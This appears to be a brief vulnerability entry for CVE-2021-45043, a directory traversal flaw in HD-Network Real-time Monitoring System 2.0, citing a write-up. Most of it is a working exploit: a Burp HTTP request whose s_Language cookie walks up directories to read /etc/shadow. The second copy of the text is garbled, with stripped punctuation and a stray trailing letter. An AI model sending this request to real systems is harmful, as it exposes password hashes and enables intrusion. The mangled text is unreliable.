HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
cve-2021-45043 HD-Network Real-time Monitoring System 20 allows / directory traversal to read /etc/shadow via the /language/lang s_Language parameter initial post cyberguy0xd1mediumcom/my-cve-2021-45043-lfi-write-up-441dad30dd7f exploiting via burp GET /language/lang HTTP/11 Host: IPtarget Cookie: s_Language=//////////////etc/shadow e